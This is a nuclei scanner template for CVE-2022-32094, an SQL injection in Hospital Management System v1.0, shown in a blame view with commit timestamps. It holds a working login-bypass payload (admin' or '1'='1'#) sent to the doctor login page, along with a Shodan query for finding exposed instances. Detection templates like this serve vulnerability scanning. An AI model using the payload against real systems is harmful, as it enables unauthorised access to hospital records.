nuclei-templates/cves/2022/CVE-2022-32094.yaml

43 lines
1.1 KiB
YAML
Raw Normal View History

2022-09-14 12:54:03 +00:00
id: CVE-2022-32094
info:
name: Hospital Management System v1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/doctor.php.
reference:
- https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/
- https://nvd.nist.gov/vuln/detail/CVE-2022-32094
classification:
cve-id: CVE-2022-32094
metadata:
2022-09-14 14:39:19 +00:00
verified: true
2022-09-14 12:54:03 +00:00
shodan-query: http.html:"Hospital Management System"
2022-09-14 14:39:19 +00:00
tags: cve,cve2022,hms,cms,sqli,auth-bypass
2022-09-14 12:54:03 +00:00
requests:
- raw:
- |
POST /hms/doctor/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-09-14 14:39:19 +00:00
- '<title>Doctor | Dashboard</title>'
- 'View Appointment History'
condition: and
2022-09-14 12:54:03 +00:00
- type: status
status:
- 200